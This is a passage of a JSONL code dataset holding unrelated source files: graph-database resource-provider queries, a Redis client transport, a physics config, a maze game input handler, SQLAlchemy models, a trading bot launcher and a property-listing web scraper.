[ResourceProvider(ctx, **rp) for rp in resource_providers]\n\n\n@db_api.placement_context_manager.reader\ndef _parent_provider_for_rp(ctx, rp):\n \"\"\"Given a resource provider, returns the UUID of its parent. If there is\n no parent for this node, returns None.\n \"\"\"\n rp_uuid = rp.uuid if isinstance(rp, ResourceProvider) else rp\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER)-[:CONTAINS*1]->\n (rp:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN parent.uuid AS parent_uuid\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n if result:\n return result[0][\"parent_uuid\"]\n else:\n return None\n\n\n@db_api.placement_context_manager.reader\ndef _root_provider_for_rp(ctx, rp):\n \"\"\"Given a resource provider, returns the UUID of its root. If there is no\n parent for this node, returns its own UUID.\n \"\"\"\n rp_uuid = rp.uuid if isinstance(rp, ResourceProvider) else rp\n query = \"\"\"\n MATCH p=(root:RESOURCE_PROVIDER)-[:CONTAINS*0..99]->\n (nd:RESOURCE_PROVIDER {uuid: '%s'})\n WITH root, p, size(relationships(p)) AS relsize\n ORDER BY relsize DESC\n RETURN root.uuid AS root_uuid\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n if result:\n return result[0][\"root_uuid\"]\n else:\n return rp_uuid\n\n\n@db_api.placement_context_manager.reader\ndef is_nested(ctx, rp1_uuid, rp2_uuid):\n \"\"\"Returns True if the two resource providers are related with a :CONTAINS\n relationship. The direction of the relationship doesn't matter.\n \"\"\"\n query = \"\"\"\n MATCH p=(rp1 {uuid: '%s'})-[:CONTAINS*]-(rp2 {uuid: '%s'})\n RETURN p\n \"\"\" % (rp1_uuid, rp2_uuid)\n result = ctx.tx.run(query).data()\n return bool(result)\n\n\n@db_api.placement_context_manager.writer\ndef _create_tree(ctx, tree, parent_uuid=None):\n atts = []\n if \"name\" in tree:\n nm = tree[\"name\"]\n atts.append(\"name: '{name}'\".format(name=nm))\n if \"type\" in tree:\n tp = tree[\"type\"]\n atts.append(\"provider_type: '{tp}'\".format(tp=tp))\n uuid = tree[\"uuid\"] if \"uuid\" in tree else db.gen_uuid()\n atts.append(\"uuid: '{uuid}'\".format(uuid=uuid))\n for trait in tree[\"traits\"]:\n atts.append(\"{trait}: True\".format(trait=trait))\n atts.append(\"generation: 0\")\n atts.append(\"created_at: timestamp()\")\n atts.append(\"updated_at: timestamp()\")\n atts_clause = \", \".join(atts)\n \n provides = []\n for rsrc in tree[\"resources\"]:\n rc_name = rsrc.get(\"name\")\n total = rsrc.get(\"total\")\n reserved = rsrc.get(\"reserved\", 0)\n min_unit= rsrc.get(\"min_unit\", 1)\n max_unit = rsrc.get(\"max_unit\", total)\n step_size = rsrc.get(\"step_size\", 1)\n allocation_ratio = rsrc.get(\"allocation_ratio\", 1)\n prov_stmnt = \"\"\"\nWITH nd\nCREATE (nd)-[:PROVIDES]->(:{rc_name}\n{{total: {total}, reserved: {reserved}, min_unit: {min_unit},\nmax_unit: {max_unit}, allocation_ratio: {allocation_ratio},\nstep_size: {step_size} }})\"\"\".format(rc_name=rc_name, total=total,\n reserved=reserved, min_unit=min_unit, max_unit=max_unit,\n allocation_ratio=allocation_ratio, step_size=step_size)\n provides.append(prov_stmnt)\n\n prov_clause = \"\\n\".join(provides)\n if parent_uuid:\n query = \"\"\"\nMATCH (parent:RESOURCE_PROVIDER {{ uuid: '{parent_uuid}' }})\nWITH parent\nCREATE (parent)-[:CONTAINS]->(nd:RESOURCE_PROVIDER {{ {atts_clause} }})\n{prov_clause}\nRETURN nd AS rp\"\"\".format(parent_uuid=parent_uuid,\n atts_clause=atts_clause, prov_clause=prov_clause)\n else:\n # Primary node\n query = \"\"\"\nCREATE (nd:RESOURCE_PROVIDER {{ {atts_clause} }})\n{prov_clause}\nRETURN nd AS rp\"\"\".format(atts_clause=atts_clause,\n prov_clause=prov_clause)\n\n result = ctx.tx.run(query).data()\n rp_rec = result[0][\"rp\"]\n # Call recursively to add child nodes, if any\n child_nodes = tree.get(\"children\", [])\n for child in child_nodes:\n _create_tree(ctx, child, rp_rec[\"uuid\"])\n return rp_rec\n","sub_path":"placement/objects/resource_provider.py","file_name":"resource_provider.py","file_ext":"py","file_size_in_byte":51025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"584684439","text":"from __future__ import (\n absolute_import,\n unicode_literals,\n)\n\nimport uuid\n\nfrom conformity import fields\n\nfrom pysoa.common.metrics import TimerResolution\nfrom pysoa.common.transport.base import (\n ClientTransport,\n get_hex_thread_id,\n)\nfrom pysoa.common.transport.exceptions import MessageReceiveTimeout\nfrom pysoa.common.transport.redis_gateway.backend.base import BaseRedisClient\nfrom pysoa.common.transport.redis_gateway.constants import DEFAULT_MAXIMUM_MESSAGE_BYTES_CLIENT\nfrom pysoa.common.transport.redis_gateway.core import RedisTransportCore\nfrom pysoa.common.transport.redis_gateway.settings import RedisTransportSchema\nfrom pysoa.common.transport.redis_gateway.utils import make_redis_queue_name\n\n\n@fields.ClassConfigurationSchema.provider(RedisTransportSchema())\nclass RedisClientTransport(ClientTransport):\n\n def __init__(self, service_name, metrics, **kwargs):\n \"\"\"\n In addition to the two named positional arguments, this constructor expects keyword arguments abiding by the\n Redis transport settings schema.\n\n :param service_name: The name of the service to which this transport will send requests (and from which it will\n receive responses)\n :type service_name: union[str, unicode]\n :param metrics: The optional metrics recorder\n :type metrics: MetricsRecorder\n \"\"\"\n super(RedisClientTransport, self).__init__(service_name, metrics)\n\n if 'maximum_message_size_in_bytes' not in kwargs:\n kwargs['maximum_message_size_in_bytes'] = DEFAULT_MAXIMUM_MESSAGE_BYTES_CLIENT\n\n self.client_id = uuid.uuid4().hex\n self._send_queue_name = make_redis_queue_name(service_name)\n self._receive_queue_name = '{send_queue_name}.{client_id}{response_queue_specifier}'.format(\n send_queue_name=self._send_queue_name,\n client_id=self.client_id,\n response_queue_specifier=BaseRedisClient.RESPONSE_QUEUE_SPECIFIER,\n )\n self._requests_outstanding = 0\n self.core = RedisTransportCore(service_name=service_name, metrics=metrics, metrics_prefix='client', **kwargs)\n\n @property\n def requests_outstanding(self):\n \"\"\"\n Indicates the number of requests currently outstanding, which still need to be received. If this value is less\n than 1, calling `receive_response_message` will result in a return value of `(None, None, None)` instead of\n raising a `MessageReceiveTimeout`.\n \"\"\"\n return self._requests_outstanding\n\n def send_request_message(self, request_id, meta, body, message_expiry_in_seconds=None):\n self._requests_outstanding += 1\n meta['reply_to'] = '{receive_queue_name}{thread_id}'.format(\n receive_queue_name=self._receive_queue_name,\n thread_id=get_hex_thread_id(),\n )\n\n with self.metrics.timer('client.transport.redis_gateway.send', resolution=TimerResolution.MICROSECONDS):\n self.core.send_message(self._send_queue_name, request_id, meta, body, message_expiry_in_seconds)\n\n def receive_response_message(self, receive_timeout_in_seconds=None):\n if self._requests_outstanding > 0:\n with self.metrics.timer('client.transport.redis_gateway.receive', resolution=TimerResolution.MICROSECONDS):\n try:\n request_id, meta, response = self.core.receive_message(\n '{receive_queue_name}{thread_id}'.format(\n receive_queue_name=self._receive_queue_name,\n thread_id=get_hex_thread_id(),\n ),\n receive_timeout_in_seconds,\n )\n except MessageReceiveTimeout:\n self.metrics.counter('client.transport.redis_gateway.receive.error.timeout').increment()\n raise\n self._requests_outstanding -= 1\n return request_id, meta, response\n else:\n # This tells Client.get_all_responses to stop waiting for more.\n return None, None, None\n","sub_path":"pysoa/common/transport/redis_gateway/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"298354185","text":"## import skeleton process\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"DAS\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1000) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n #'root://cmseos.fnal.gov//store/user/cmsdas/2017/pre_exercises/DYJetsToLL.root'\n '/store/mc/RunIISpring15DR74/TTGJets_TuneCUETP8M1_13TeV-amcatnloFXFX-madspin-pythia8/MINIAODSIM/Asympt25ns_MCRUN2_74_V9-v1/30000/101C5701-2141-E511-B832-00259073E532.root'\n )\n )\n\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n fileName = cms.untracked.string('slimMiniAOD_MC_MuEle_topquark.root'),\n #outputCommands = cms.untracked.vstring(['drop *', 'keep *_slimmedMuons__*', 'keep *_slimmedElectrons__*', 'keep *_slimmedJets__*', 'keep *_slimmedMETs__*'])\n outputCommands = cms.untracked.vstring(['drop *', \\\n 'keep *_slimmedMuons__*', \\\n 'keep *_slimmedElectrons__*', \\\n 'keep *_slimmedJets__*', \\\n 'keep *_slimmedJetsPuppi__*', \\\n 'keep *_slimmedMETs__*', \\\n 'keep *_slimmedTaus__*', \\\n #'keep *_slimmedTausBoosted__*', \\\n 'keep *_offlineSlimmedPrimaryVertices__*', \\\n 'keep *_prunedGenParticles__*', \\\n 'keep *_slimmedPhotons__*'])\n )\n\nprocess.end = cms.EndPath(process.out)\n","sub_path":"scratch/process_for_crab_cfg.py","file_name":"process_for_crab_cfg.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"473510415","text":"# -*- coding: utf-8 -*-\n\nfrom pyfr.readers.native import read_pyfr_data\nfrom pyfr.inifile import Inifile\n\n\nclass BaseWriter(object):\n \"\"\"Functionality for post-processing PyFR data to visualisation formats\"\"\"\n\n def __init__(self, args):\n \"\"\"Loads PyFR mesh and solution files\n\n A check is made to ensure the solution was computed on the mesh.\n\n :param args: Command line arguments passed from scripts/postp.py\n :type args: class 'argparse.Namespace'\n\n \"\"\"\n self.args = args\n self.outf = args.outf\n\n # Load mesh and solution files\n self.soln = read_pyfr_data(args.solnf)\n self.mesh = read_pyfr_data(args.meshf)\n\n # Get element types and array shapes\n self.mesh_inf = self.mesh.array_info\n self.soln_inf = self.soln.array_info\n\n # Check solution and mesh are compatible\n if self.mesh['mesh_uuid'] != self.soln['mesh_uuid']:\n raise RuntimeError('Solution \"%s\" was not computed on mesh \"%s\"' %\n (args.solnf, args.meshf))\n\n # Load config file\n self.cfg = Inifile(self.soln['config'])\n","sub_path":"pyfr/writers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"558165557","text":"# def reverse(text):\n# return text[::-1]\n#\n#\n# def is_palindrome(text):\n# return text == reverse(text)\n#\n#\n# something = input('Enter text: ')\n# print(is_palindrome(something))\n\n\n# poem = '''\n# line 1\n# line 2\n#\n# Line 3'''\n#\n# f = open('poem.txt', 'w')\n# f.write(poem)\n# f.close()\n#\n# f = open('poem.txt', 'r')\n# while True:\n# line = f.readline()\n# if len(line) == 0:\n# break\n# else:\n# print(line, end='')\n# f.close()\n\n\n# import pickle\n#\n#\n# shoplistfile = 'shoplist.data'\n# shoplist = ['apple', 'mango', 'carrot']\n#\n# f = open(shoplistfile, 'wb')\n# pickle.dump(shoplist, f)\n# f.close()\n#\n# del shoplist\n#\n# f = open(shoplistfile, 'rb')\n# storedlist = pickle.load(f)\n# print(storedlist)\n\n\nimport io\n\nf = io.open(\"abc.txt\", \"w\", encoding='utf-8')\nf.write(\"超级没办法\")\nf.close()\n\nwith io.open(\"abc.txt\") as text:\n print(text)","sub_path":"byte-of-python/04_io.py","file_name":"04_io.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"301373733","text":"\"\"\"Input Handler for the game Dimensional Maze.\n\nThis module handles takes in all user input for and translates it into actions\nin the Dimensional Maze game.\n\"\"\"\nimport logging\nimport pygame\nfrom enum import Enum\n\n#Module level logger. Outputs debug info to external file.\nlogging.basicConfig(filename='log.txt', filemode='w', level=logging.DEBUG)\nlogger = logging.getLogger('input_handler')\n\n\ndef handle_key_event(keys):\n \"\"\"Take in an array of currently pressed down keys and return a game\n action.\n\n An array of currently pressed down keys is turned into a game action. That\n action is a tuple containing an Input_Type enum value describing the type\n of action, the dimensions involved in the action and the direction the\n action is going.\n \n Keyword arguments:\n keys -- An array representing the keys which are currently pressed down.\n This array is navigatable using the pygame module.\n \"\"\"\n #If Escape key has been pressed, return the EXIT Input_Type.\n if keys[pygame.K_ESCAPE]:\n logger.debug(\"Escape\")\n return (Input_Type.EXIT, -1, 0)\n\n #This loop handles commands for movement in any numbered dimension up to\n #nine. If any of the keys 1-9 is pressed at the same time as the Up or Down\n #key, then a this returns the MOVE_4D Input_Type as well as the numbered\n #dimension (from the numbered key pressed minus one) and direction (Up = 1,\n #Down = -1). The numbering of the dimensions is absolute based on the\n #maze's perspective.\n for direction in range(0, 2):\n for dimension in range(0, 9):\n if (keys[pygame.K_1 + dimension] and \n keys[pygame.K_UP + direction]):\n log = ' '.join(\n [\"MOVE_4D\", str(dimension), str(-2 * direction + 1)])\n logger.debug(log)\n return (Input_Type.MOVE_4D, dimension, -2 * direction + 1)\n\n #This loop handles commands for rotation between the first dimension and\n #any other numbered dimension up to nine. If any of the keys 2-9 is pressed\n #at the same time as the W or S key, then a this returns the ROTATE_4D\n #Input_Type as well as the numbered dimensions involved in the rotation (0\n #and the numbered key pressed minus one) and direction (W = 1, S = -1). The\n #numbering of the dimensions is absolute based on the maze's perspective.\n #The numbering of the dimensions is relative based on the player's\n #orientation, meaning the first dimension is always facing forward.\n for direction in range(0, 2):\n for dimension in range(1, 9):\n if (keys[pygame.K_1 + dimension] and\n keys[pygame.K_w - 4 * direction]):\n log = ' '.join(\n [\"ROTATE_4D\", str(dimension), str(-2 * direction + 1)])\n logger.debug(log)\n return (Input_Type.ROTATE_4D, dimension, -2 * direction + 1)\n\n #This if-else statement handles all commands for movement and rotation\n #within the first three dimensions based on the player's orientation. The\n #keys Up, Down, Right, Left, Z and X move the player forwards, backwards,\n #right, left, up and down in 3D space respectively, while the keys D, A, W,\n #S, Q and E turn the player right, left, up, down, anti-clockwise and\n #clock-wise in 3D space respectively. The MOVE_3D or ROTATE_3D Input_Type\n #is returned along with the dimension/s involved and the direction.\n if (keys[pygame.K_UP]):\n logger.debug(\"UP\")\n return (Input_Type.MOVE_3D, 0, 1)\n elif (keys[pygame.K_DOWN]):\n logger.debug(\"DOWN\")\n return (Input_Type.MOVE_3D, 0, -1)\n elif keys[pygame.K_RIGHT]:\n logger.debug(\"RIGHT\")\n return (Input_Type.MOVE_3D, 1, 1)\n elif keys[pygame.K_LEFT]:\n logger.debug(\"LEFT\")\n return (Input_Type.MOVE_3D, 1, -1)\n elif keys[pygame.K_z]:\n logger.debug(\"Z\")\n return (Input_Type.MOVE_3D, 2, 1)\n elif keys[pygame.K_x]:\n logger.debug(\"X\")\n return (Input_Type.MOVE_3D, 2, -1)\n elif keys[pygame.K_d]:\n logger.debug(\"D\")\n return (Input_Type.ROTATE_3D, [0, 1], 1)\n elif keys[pygame.K_a]:\n logger.debug(\"A\")\n return (Input_Type.ROTATE_3D, [0, 1], -1)\n elif keys[pygame.K_w]:\n logger.debug(\"W\")\n return (Input_Type.ROTATE_3D, [0, 2], 1)\n elif keys[pygame.K_s]:\n logger.debug(\"S\")\n return (Input_Type.ROTATE_3D, [0, 2], -1)\n elif keys[pygame.K_q]:\n logger.debug(\"Q\")\n return (Input_Type.ROTATE_3D, [1, 2], 1)\n elif keys[pygame.K_e]:\n logger.debug(\"E\")\n return (Input_Type.ROTATE_3D, [1, 2], -1)\n else:\n #If no combination of keys was recognised then it is an invalid\n #command and the INVALID_MOVE Input_Type is returned.\n logger.debug(' '.join([\"Invalid\", ' '.join(str(key) for key in keys)]))\n return (Input_Type.INVALID_MOVE, -1, -1)\n\n\nclass Input_Type(Enum):\n \"\"\"An enumerated class for the types of input received from the player\n\n INVALID_MOVE For use when an input is not recognised.\n EXIT For use when an 'exit or quit game' command is recognised.\n MOVE_3D For use when a command to move within the first three\n dimensions is recognised.\n ROTATE_3D For use when a command to rotate within the first three\n dimensions is recognised.\n MOVE_4D For use when a command to move through any dimension is\n recognised.\n ROTATE_4D For use when a command to rotate through any dimension is\n recognised.\n \"\"\"\n INVALID_MOVE = -1\n EXIT = 0\n MOVE_3D = 1\n ROTATE_3D = 2\n MOVE_4D = 3\n ROTATE_4D = 4","sub_path":"input_handler.py","file_name":"input_handler.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"269751144","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nModelClasses.py\n\nCreated by José Sánchez-Gallego on 23 Jul 2015.\nLicensed under a 3-clause BSD license.\n\nRevision history:\n 23 Jul 2015 J. Sánchez-Gallego\n Initial version\n 21 Feb 2016 J. Sánchez-Gallego\n Rewritten as classes derived from declarative base.\n\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom sdss.internal.database.DatabaseConnection import DatabaseConnection\nfrom sqlalchemy.orm import relationship, configure_mappers, backref\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy import case\nfrom sqlalchemy.ext.hybrid import hybrid_property, hybrid_method\nfrom sqlalchemy import ForeignKeyConstraint, func\nimport shutil\nimport re\nimport math\nimport itertools\n\ntry:\n import cStringIO as StringIO\nexcept ImportError:\n from io import StringIO\n\ndb = DatabaseConnection()\nBase = db.Base\n\n\ndef cameliseClassname(tableName):\n \"\"\"Produce a camelised class name.\"\"\"\n\n return str(tableName[0].upper() +\n re.sub(r'_([a-z])',\n lambda m: m.group(1).upper(), tableName[1:]))\n\n\ndef ClassFactory(name, tableName, BaseClass=db.Base, fks=None):\n tableArgs = [{'autoload': True, 'schema': 'mangasampledb'}]\n if fks:\n for fk in fks:\n tableArgs.insert(0, ForeignKeyConstraint([fk[0]], [fk[1]]))\n\n newclass = type(\n name, (BaseClass,),\n {'__tablename__': tableName,\n '__table_args__': tuple(tableArgs)})\n\n return newclass\n\n\nclass MangaTarget(Base):\n __tablename__ = 'manga_target'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n def __repr__(self):\n return ''.format(self.pk,\n self.mangaid)\n\n\nclass Anime(Base):\n __tablename__ = 'anime'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n def __repr__(self):\n return ''.format(self.pk, self.anime)\n\n\nclass Character(Base):\n __tablename__ = 'character'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n target = relationship(MangaTarget, backref='character', uselist=False)\n anime = relationship(Anime, backref='characters')\n\n def __repr__(self):\n return ''.format(self.pk, self.name)\n\n def savePicture(self, path):\n \"\"\"Saves the picture blob to disk.\"\"\"\n\n buf = StringIO(self.picture)\n with open(path, 'w') as fd:\n buf.seek(0)\n shutil.copyfileobj(buf, fd)\n\n return buf\n\n\nclass Catalogue(Base):\n __tablename__ = 'catalogue'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n @property\n def isCurrent(self):\n return self.currentCatalogue is not None\n\n def __repr__(self):\n return (''\n .format(self.pk, self.catalogue_name, self.version,\n self.isCurrent))\n\n\nclass CurrentCatalogue(Base):\n __tablename__ = 'current_catalogue'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n catalogue = relationship(\n 'Catalogue', backref=backref('currentCatalogue', uselist=False))\n\n def __repr__(self):\n return ''.format(self.pk)\n\n\nclass MangaTargetToMangaTarget(Base):\n __tablename__ = 'manga_target_to_manga_target'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n def __repr__(self):\n return ''.format(self.pk)\n\n\nclass NSA(Base):\n __tablename__ = 'nsa'\n __table_args__ = (\n ForeignKeyConstraint(['catalogue_pk'], ['mangasampledb.catalogue.pk']),\n {'autoload': True, 'schema': 'mangasampledb'})\n\n def __repr__(self):\n return ''.format(self.pk, self.nsaid)\n\n\nclass MangaTargetToNSA(Base):\n __tablename__ = 'manga_target_to_nsa'\n __table_args__ = (\n ForeignKeyConstraint(['manga_target_pk'],\n ['mangasampledb.manga_target.pk']),\n ForeignKeyConstraint(['nsa_pk'], ['mangasampledb.nsa.pk']),\n {'autoload': True, 'schema': 'mangasampledb'})\n\n def __repr__(self):\n return ''.format(self.pk)\n\n# Relationship between NSA and MangaTarget\nNSA.mangaTargets = relationship(\n MangaTarget, backref='NSA_objects', secondary=MangaTargetToNSA.__table__)\n\n# Now we create the remaining tables.\ninsp = inspect(db.engine)\nschemaName = 'mangasampledb'\nallTables = insp.get_table_names(schema=schemaName)\n\ndone_names = db.Base.metadata.tables.keys()\nfor tableName in allTables:\n if schemaName + '.' + tableName in done_names:\n continue\n className = str(tableName).upper()\n\n newClass = ClassFactory(\n className, tableName,\n fks=[('catalogue_pk', 'mangasampledb.catalogue.pk')])\n newClass.catalogue = relationship(\n Catalogue, backref='{0}_objects'.format(tableName))\n locals()[className] = newClass\n done_names.append(schemaName + '.' + tableName)\n\n if 'manga_target_to_' + tableName in allTables:\n relationalTableName = 'manga_target_to_' + tableName\n relationalClassName = 'MangaTargetTo' + tableName.upper()\n newRelationalClass = ClassFactory(\n relationalClassName, relationalTableName,\n fks=[('manga_target_pk', 'mangasampledb.manga_target.pk'),\n ('nsa_pk', 'mangasampledb.nsa.pk')])\n\n locals()[relationalClassName] = newRelationalClass\n done_names.append(schemaName + '.' + relationalTableName)\n\n newClass.mangaTargets = relationship(\n MangaTarget, backref='{0}_objects'.format(tableName),\n secondary=newRelationalClass.__table__)\n\n\ndef HybridProperty(parameter, index=None):\n\n @hybrid_property\n def hybridProperty(self):\n if index is not None:\n return getattr(self, parameter)[index]\n else:\n return getattr(self, parameter)\n\n @hybridProperty.expression\n def hybridProperty(cls):\n if index is not None:\n # It needs to be index + 1 because Postgresql arrays are 1-indexed.\n return getattr(cls, parameter)[index + 1]\n else:\n return getattr(cls, parameter)\n\n return hybridProperty\n\n\ndef HybridColour(parameter):\n\n @hybrid_method\n def colour(self, bandA, bandB):\n\n for band in [bandA, bandB]:\n columnName = parameter + '_' + band\n assert hasattr(self, columnName), \\\n 'cannot find column {0}'.format(columnName)\n\n bandA_param = getattr(self, parameter + '_' + bandA)\n bandB_param = getattr(self, parameter + '_' + bandB)\n\n return bandA_param - bandB_param\n\n @colour.expression\n def colour(cls, bandA, bandB):\n\n for band in [bandA, bandB]:\n columnName = parameter + '_' + band\n assert hasattr(cls, columnName), \\\n 'cannot find column {0}'.format(columnName)\n\n bandA_param = getattr(cls, parameter + '_' + bandA)\n bandB_param = getattr(cls, parameter + '_' + bandB)\n\n return bandA_param - bandB_param\n\n return colour\n\n\ndef HybridMethodToProperty(method, bandA, bandB):\n\n @hybrid_property\n def colour_property(self):\n return getattr(self, method)(bandA, bandB)\n\n return colour_property\n\n\n# Adds hybrid properties defining colours for petroth50_el (for now).\nsetattr(NSA, 'petroth50_el_colour', HybridColour('petroth50_el'))\nfor ii, band in enumerate('FNurgiz'):\n propertyName = 'petroth50_el_{0}'.format(band)\n setattr(NSA, propertyName, HybridProperty('petroth50_el', ii))\n\n# Creates an attribute for each colour.\nfor colour_a, colour_b in itertools.combinations('FNugriz', 2):\n setattr(NSA, 'petroth50_el_{0}_{1}'.format(colour_a, colour_b),\n HybridMethodToProperty('petroth50_el_colour', colour_a, colour_b))\n\n\n# Add stellar mass hybrid attributes to NSA catalog\ndef logmass(parameter):\n\n @hybrid_property\n def mass(self):\n par = getattr(self, parameter)\n return math.log10(par) if par > 0. else 0.\n\n @mass.expression\n def mass(cls):\n par = getattr(cls, parameter)\n return case(\n [\n (par > 0., func.log(par)),\n (par == 0., 0.)\n ]\n )\n\n return mass\n\nsetattr(NSA, 'petro_logmass_el', logmass('petro_mass_el'))\nsetattr(NSA, 'sersic_logmass', logmass('sersic_mass'))\n\nconfigure_mappers()\n","sub_path":"python/mangaSampleDB/ModelClasses.py","file_name":"ModelClasses.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"306818270","text":"import random\nimport string\nimport os\n\nsize = 5\nmin_size = 3\naaaaaa = 100\n\ndef saveCode(code):\n global size\n i = 0\n while True:\n name = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size))\n \n if not os.path.exists(\"codes/s{}/{}.txt\".format(str(size) , name)):\n\n # Создадим директорию если нет\n if not os.path.exists( \"codes/s{}\".format(str(size)) ):\n os.makedirs(\"codes/s{}\".format(str(size)))\n\n # Создаем файл\n f = open(\"codes/s{}/{}.txt\".format(str(size) , name) , \"w\" ,encoding=\"utf-8\")\n f.write(code)\n f.close()\n size -= 1\n if size < min_size:\n size = min_size\n return name\n\n if i == aaaaaa:\n size += 1\n i = 0\n\n i += 1\n\ndef loadCode(id):\n id = str(id)\n\n size = len(id)\n try:\n with open(\"codes/s{}/{}.txt\".format( str(size) , id ) , \"r\" , encoding=\"utf-8\") as f:\n code = f.read()\n f.close()\n return code\n except:\n return False\n\nif __name__ == \"__main__\":\n for i in range():\n print(saveCode())","sub_path":"codemy-master/app/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"120079249","text":"import logging\nimport os\n\nimport ccxt\nimport yaml\n\nfrom tradeexecutor import CryptoExchange, TradeExecutor\nfrom telegram_bot import TelegramBot\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n format='%(asctime)s - %(levelname)s - %(message)s',\n level=logging.INFO\n )\n c_dir = os.path.dirname(__file__)\n with open(os.path.join(c_dir, \"..\", \"secret_key.yml\")) as f:\n file_data = yaml.safe_load(f)\n\n ccxt_ex = ccxt.bitfinex()\n ccxt_ex.apiKey = file_data['api_key']\n ccxt_ex.secret = file_data['secret']\n\n exchange = CryptoExchange(ccxt_ex)\n trade_executor = TradeExecutor(exchange)\n telegram_bot = TelegramBot(\n file_data['telegram_ktn'],\n file_data['user_id'],\n trade_executor\n )\n\n telegram_bot.start_bot()","sub_path":"scr/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"225785806","text":"# -*- coding: utf-8 -*-\nimport re\n\nfrom scrapy.http import Request\nfrom scrapy.spider import Spider\nfrom scrapy.selector import Selector\n\nfrom POPOF_crawler.items import PopofItem\n\nclass NorthSpider(Spider):\n\n name = \"north\"\n code = \"N\"\n domain = \"http://www.fnpn.gov.tw\"\n\n start_urls = [\n \"http://www.fnpn.gov.tw/ct/CFT.php?page=CFTMain&area=N000\",\n\n ]\n def __init__(self,*args, **kwargs):\n super(NorthSpider, self).__init__(*args, **kwargs)\n\n pass\n\n def parse(self, response):\n sel = Selector(response)\n\n urls = sel.xpath(\"//td[@class='table-border-yellow']/a/@href\").extract()\n\n for url in urls:\n target_url = self.domain + url\n yield Request(url=target_url,callback=self.parse_items)\n\n def parse_items(self, response):\n\n def extract_div_data(td):\n return td.xpath(\"div/text()\").extract()[0].encode('utf-8')\n\n def extract_span_data(td):\n return td.xpath(\"span/text()\").extract()[0].encode('utf-8')\n\n def extract_div_span_data(td):\n return td.xpath(\"div/span/text()\").extract()[0].encode('utf-8')\n\n def generate_id(year, batch_no, serial_no):\n return self.code + year.zfill(3) + batch_no.zfill(2) + serial_no.decode('utf-8').replace(u'\\xa0','').zfill(2)\n\n\n sel = Selector(response)\n\n # catch the case_title (include year, batch_no)\n case_title = sel.xpath(\"//div[@class='12-oran-warning']/text()\").extract()[0]\n year, batch_no = re.findall(u\".*[分署|辦事處](\\d+)年.*第(\\d+)批.*\", case_title)[0]\n\n # catch all tr tag of this table\n tr_list = sel.xpath(\"//table[@class='table-border-yellow']/tr\")\n\n tr_list_len = len(tr_list)\n\n items = []\n\n for index in range(1, tr_list_len):\n item = PopofItem()\n\n tds = tr_list[index].xpath('td')\n\n td_count = len(tds)\n\n # need to pass some fiels if it's rowspan\n if td_count == 3:\n item['addr'] = extract_div_data(tds[0])\n item['area'] = extract_div_data(tds[1])\n item['category'] = extract_span_data(tds[2])\n\n prev_item = items[-1]\n\n item['id'] = prev_item['id']\n item['security_deposits'] = prev_item['security_deposits']\n item['notes'] = prev_item['notes']\n item['stop'] = prev_item['stop']\n else:\n item['id'] = generate_id(year, batch_no ,extract_div_span_data(tds[0]))\n item['addr'] = extract_div_data(tds[1])\n item['area'] = extract_div_data(tds[2])\n item['category'] = extract_span_data(tds[3])\n item['price'] = extract_span_data(tds[4])\n item['security_deposits'] = extract_span_data(tds[5])\n item['notes'] = extract_span_data(tds[7])\n item['stop'] = extract_div_span_data(tds[8])\n\n items.append(item)\n pass\n\n return items\n pass\n","sub_path":"POPOF_crawler/spiders/north_spiders.py","file_name":"north_spiders.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
